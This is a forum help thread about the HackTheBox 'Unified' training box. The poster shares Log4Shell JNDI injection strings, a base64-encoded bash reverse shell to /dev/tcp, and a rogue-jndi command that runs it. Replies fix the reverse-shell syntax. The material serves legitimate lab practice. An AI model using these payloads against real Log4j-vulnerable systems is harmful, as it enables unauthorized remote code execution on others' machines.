Stuck on Unified Box (Starting Point Tier 2)

I’m super stuck on the HTB Starting Point Box “Unified”. Can’t seem to get a reverse shell for the life of me.

Related to this thread on Reddit yet for some reason I couldn’t post this on there.

Only difference to the HTB write-up is that I’m using Zaproxy instead of BurpSuite, yet the the steps are the same.

The response from rogue-jndi is there:

Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload

So I know I’m getting some kind of connection from the target, yet my netcat listener doesn’t do anything:

sudo netcat -lvnp 4444 
listening on [any] 4444 ...

Here are the notes I’ve made on the box so far:

target = 10.129.163.80

target url = https://target_IP:8443/manage/account/login?redirect=%2Fmanage

Our IP = 10.10.16.140

payload 1 =

"${jndi:ldap://10.10.16.140}" # Injected into “remember” field on login page. Used to confirm vulnerability by establishing tcpdump reverse connection on port 389

payload 2 =

"${jndi:ldap://10.10.16.140:1389/o=tomcat}" # Injected into “remember” field on login page. Rogue-Jndi captures connection on port 1389. Spawns shell on netcat listener

Reverse shell base64 encoding =

echo 'bash -c bash -i >&/dev/tcp/10.10.16.140/4444 0>&1' | base64

Base64 Reverse Shell Value = YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuMTQwLzQ0NDQgMD4mMQo=

RogueJndi Payload =

java -jar Github/rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuMTQwLzQ0NDQgMD4mMQo=}|{base64,-d}|{bash,-i}" --hostname "[10.10.16.140](https://10.10.16.140/)" # used to create jndi reverse listener

Can anyone see where I’ve gone wrong? This box is driving me nuts!

One thing I have noticed is that on every write-up I’ve seen, their base64 value has two “=” signs at the end, where mine just has one? Don’t know if this is relevant or not?

Finally managed to get a shell, seemed to be an issue with my base64 input, perhaps line break problems, I’m not sure.

1 Like

when you copy and paste from the example

it will put the {base64, -d} on a third line like this

put the curser in front of {base64, -d} and hit backspace to make it go back to 2 lines. It should look like this

1 Like

It worked somehow…
I dont know why it worked but thanks !!

I sat there all day and it didn’t work either.
It turns out that the problem is ampersand, it simply redirected incorrectly.
Here is the correct:
echo ‘bash -c bash -i >/dev/tcp/YOR IP/4444 0>&1’ | base64

urrrrggghhhh 8hrs for this, error" its just fckn* "SPAAAAACEEEE*!!! anyway, thanks guys, hacking is fun!